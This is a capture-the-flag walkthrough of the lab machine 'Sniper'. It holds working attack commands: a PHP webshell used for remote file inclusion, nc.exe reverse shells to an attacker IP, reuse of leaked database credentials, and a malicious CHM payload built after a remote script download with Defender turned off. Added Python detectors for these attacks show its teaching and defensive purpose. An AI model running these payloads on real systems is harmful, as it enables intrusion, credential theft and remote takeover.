Sniper

Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.151 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Wed Mar 22 09:59:49 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.151
Nmap scan report for 10.10.10.151
Host is up (0.039s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49667/tcp open unknown
# Nmap done at Wed Mar 22 10:00:15 2023 -- 1 IP address (1 host up) scanned in 26.45 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,135,139,445,49667 10.10.10.151 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Wed Mar 22 10:00:54 2023 as: nmap -sCV -p80,135,139,445,49667 -Pn -oN targeted 10.10.10.151
Nmap scan report for 10.10.10.151
Host is up (0.052s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Sniper Co.
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-03-22T16:01:53
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: 7h00m01s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 22 10:02:30 2023 -- 1 IP address (1 host up) scanned in 96.02 seconds
The Sniper Co. website has a few links, but only the services link and the user portal work.

The services link goes to the /blog/index.php page.

We can choose the language of the site; the PHP file for that language is then loaded via the lang GET parameter.

Exploitation
As we know this is a Windows machine, we could try to exploit a local file inclusion in the lang parameter by supplying the absolute path of the Windows hosts file (the equivalent of /etc/hosts).
http://10.10.10.151/blog/?lang=\Windows\System32\Drivers\etc\hosts

Now that we know that it is vulnerable to LFI, we could try to exploit RFI (Remote File Inclusion). As it is a Windows machine, and the website runs PHP, let's create a PHP webshell and share it with an SMB server.
echo '<?php system($_GET["cmd"]);?>' > pwn.php
impacket-smbserver smbFolder $(pwd) -smb2support
Now, if we try to retrieve pwn.php from our SMB server, we'll see that it doesn't really work.
http://10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=whoami
This sometimes happens because of authentication issues with the Impacket SMB server. We can share the folder through Samba with net usershare instead.
service smbd start
net usershare add smbFolder $(pwd) '' 'Everyone:F' 'guest_ok=y'
Now it should work, and we should be able to run commands as nt authority\iusr.
http://10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=whoami

Time to get a shell. First, copy the nc.exe binary from SecLists into our current directory.
cp /opt/SecLists/Web-Shells/FuzzDB/nc.exe .
Now, set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: specify the port to listen on.
Finally, send a reverse shell to the netcat listener using the nc.exe binary shared from our SMB server.
http://10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.151 49677
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\blog>whoami
whoami
nt authority\iusr
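From the defender's side, the LFI and RFI requests above leave a clear trace in the IIS logs. The following Python is an added example (not part of the original write-up) that scans constructed IIS W3C log lines for include-style values in the blog's lang parameter: absolute Windows paths, directory traversal, and UNC or URL remote includes, noting when a cmd parameter rides along. The field layout and the sample lines are assumptions modelled on the requests shown above.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines (assumed IIS W3C layout):
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2023-03-22 16:01:10 10.10.10.151 GET /blog/index.php lang=es 80 - 10.10.14.11 Mozilla/5.0 200
2023-03-22 16:02:30 10.10.10.151 GET /blog/index.php lang=\\Windows\\System32\\Drivers\\etc\\hosts 80 - 10.10.14.11 curl/7.88 200
2023-03-22 16:05:44 10.10.10.151 GET /blog/index.php lang=\\\\10.10.14.11\\smbFolder\\pwn.php&cmd=whoami 80 - 10.10.14.11 curl/7.88 200
2023-03-22 16:06:01 10.10.10.151 GET /blog/index.php lang=..%2F..%2Fuser%2Fdb.php 80 - 10.10.14.11 curl/7.88 200
"""

UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")       # \\host\share\file (remote include over SMB)
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # http://host/file (remote include over HTTP)
ABS_RE = re.compile(r"^([a-z]:)?[\\/]", re.I)        # C:\..., \Windows\..., /etc/...
TRAV_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")       # ..\ or ../ anywhere in the value


def classify_lang(value: str) -> list:
    """Return the indicator names matched by one decoded lang= value ([] if it looks benign)."""
    v = unquote(value)
    hits = []
    if UNC_RE.search(v) or URL_RE.search(v):
        hits.append("rfi_remote_include")
    elif ABS_RE.search(v):
        hits.append("lfi_absolute_path")
    if TRAV_RE.search(v):
        hits.append("lfi_traversal")
    return hits


def scan_log(text: str) -> list:
    """Report every /blog/ request whose lang= value looks like an include attack."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 9 or line.startswith("#"):   # skip header lines and short rows
            continue
        stem, query, client = fields[4], fields[5], fields[8]
        if not stem.lower().startswith("/blog/"):
            continue
        params = parse_qs(query, keep_blank_values=True)
        for value in params.get("lang", []):
            hits = classify_lang(value)
            if not hits:
                continue
            if "cmd" in params:                        # webshell argument riding along with the include
                hits.append("cmd_param_present")
            findings.append({"line": lineno, "client": client, "lang": unquote(value), "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['client']}: {f['indicators']} lang={f['lang']!r}")
```

The same checks belong in the application itself: resolving lang against a fixed allowlist of language files would have stopped every one of these requests.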
Privilege Escalation
If we go back one directory and into C:\inetpub\wwwroot\user, we'll see a file called db.php with some database credentials.
type \inetpub\wwwroot\user\db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
As seen below, there is a user called Chris.
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Chris DefaultAccount
Guest WDAGUtilityAccount
The command completed with one or more errors.
We could check whether he is reusing the same password as the database user. Let's get a PowerShell shell and try to run commands as Chris by creating a PSCredential and using Invoke-Command.
powershell
hostname
$user = "Sniper\chris"
$password = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)
Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock { whoami }
sniper\chris
As we can run commands as chris, let's get a reverse shell as him. First, set another netcat listener on port 5555.
rlwrap nc -lvnp 5555
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: specify the port to listen on.
Then send the reverse shell using Invoke-Command. After that, we'll be able to grab the user flag.
Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock { \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555 }
Listening on 0.0.0.0 5555
Connection received on 10.10.10.151 49684
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Chris\Documents>whoami
whoami
sniper\chris
C:\Users\Chris\Documents>type \users\chris\desktop\user.txt
type \users\chris\desktop\user.txt
ab1b4b2cbc4b00100e1a012589859379
Taking a look at the directories, we'll see that there is a directory called Docs with a file called note.txt.
dir \docs
Volume in drive C has no label.
Volume Serial Number is 2382-B43B
Directory of C:\docs
10/01/2019 01:04 PM <DIR> .
10/01/2019 01:04 PM <DIR> ..
04/11/2019 09:31 AM 285 note.txt
04/11/2019 09:17 AM 552,607 php for dummies-trial.pdf
2 File(s) 552,892 bytes
2 Dir(s) 2,283,577,344 bytes free
The note asks Chris to drop a file (the documentation for a new app) in that directory.
type \docs\note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
In fact, if we take a look in the downloads folder of chris, we'll see a .chm file, which suggests that the Sniper CEO is waiting for a CHM in the Docs directory.
dir \users\chris\downloads
Volume in drive C has no label.
Volume Serial Number is 2382-B43B
Directory of C:\users\chris\downloads
04/11/2019 08:36 AM <DIR> .
04/11/2019 08:36 AM <DIR> ..
04/11/2019 08:36 AM 10,462 instructions.chm
1 File(s) 10,462 bytes
2 Dir(s) 2,283,577,344 bytes free
We could create a malicious file and drop it in the Docs directory, so that when someone opens it, it sends us a reverse shell as that user. To compile this type of file, we'll need to install Microsoft HTML Help Workshop on a Windows machine. Download the installer from here.
We can compile a malicious CHM file with a custom payload using the Out-CHM.ps1 script from Nishang. On our Windows machine, import the script with PowerShell. Make sure Windows Defender is turned off first.
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1')
Then, compile the CHM file with a payload that will send us a reverse shell to port 6666 using the nc.exe binary located in C:\Docs.
Out-CHM -Payload "C:\Docs\nc.exe -e cmd 10.10.14.11 6666" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
This will create the doc.chm file. Transfer it to our Linux machine, and then place it in the Docs directory together with the nc.exe binary.
copy \\10.10.14.11\smbFolder\nc.exe
copy \\10.10.14.11\smbFolder\doc.chm
dir
Volume in drive C has no label.
Volume Serial Number is 2382-B43B
Directory of C:\Docs
03/22/2023 06:43 PM <DIR> .
03/22/2023 06:43 PM <DIR> ..
03/22/2023 04:31 AM 13,430 doc.chm
03/22/2023 03:43 AM 28,160 nc.exe
04/11/2019 09:31 AM 285 note.txt
04/11/2019 09:17 AM 552,607 php for dummies-trial.pdf
4 File(s) 594,482 bytes
2 Dir(s) 2,283,245,568 bytes free
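On the defending side, the CHM drop above leaves a distinctive process chain: the HTML Help viewer (hh.exe) runs the embedded command, which then launches nc.exe out of a user-writable folder. The following Python is an added example (not from the original write-up) that walks constructed Sysmon-style process-creation records and flags shells or untrusted binaries descending from hh.exe. The field names, PIDs and paths are assumptions modelled on the chain shown above.

```python
from pathlib import PureWindowsPath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed Sysmon-style (Event ID 1) records mirroring the chain above:
# explorer.exe -> hh.exe opens C:\Docs\doc.chm -> cmd.exe -> C:\Docs\nc.exe
EVENTS = [
    {"Pid": 2000, "ParentPid": 1000, "Image": r"C:\Windows\hh.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r'"C:\Windows\hh.exe" C:\Docs\doc.chm'},
    {"Pid": 2100, "ParentPid": 2000, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\hh.exe", "CommandLine": r'cmd.exe /c "C:\Docs\nc.exe -e cmd 10.10.14.11 6666"'},
    {"Pid": 2200, "ParentPid": 2100, "Image": r"C:\Docs\nc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"C:\Docs\nc.exe -e cmd 10.10.14.11 6666"},
    {"Pid": 3000, "ParentPid": 1000, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"notepad.exe C:\Docs\note.txt"},
]


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def descends_from_hh(ev: dict, by_pid: dict) -> bool:
    """Walk ParentPid links upward; True if hh.exe is anywhere in the ancestry."""
    seen = set()
    cur = by_pid.get(ev["ParentPid"])
    while cur is not None and cur["Pid"] not in seen:
        seen.add(cur["Pid"])
        if image_name(cur["Image"]) == "hh.exe":
            return True
        cur = by_pid.get(cur["ParentPid"])
    return False


def find_chm_payloads(events: list) -> list:
    """Return (pid, reason) for shells or untrusted binaries running under an hh.exe ancestor."""
    by_pid = {e["Pid"]: e for e in events}
    hits = []
    for ev in events:
        if not descends_from_hh(ev, by_pid):
            continue
        if image_name(ev["Image"]) in SHELLS:
            hits.append((ev["Pid"], "shell spawned under hh.exe"))
        elif not ev["Image"].lower().startswith(TRUSTED_DIRS):
            hits.append((ev["Pid"], "untrusted binary spawned under hh.exe"))
    return hits


if __name__ == "__main__":
    for pid, reason in find_chm_payloads(EVENTS):
        print(f"pid {pid}: {reason}")
```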
Finally, set a netcat listener on port 6666 and wait for the reverse shell as the administrator. Then all we have to do is reap the harvest and take the root flag.
rlwrap nc -lvnp 6666
Listening on 0.0.0.0 6666
Connection received on 10.10.10.151 49690
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
61a944ebe41ca6ee9b841244179aabf5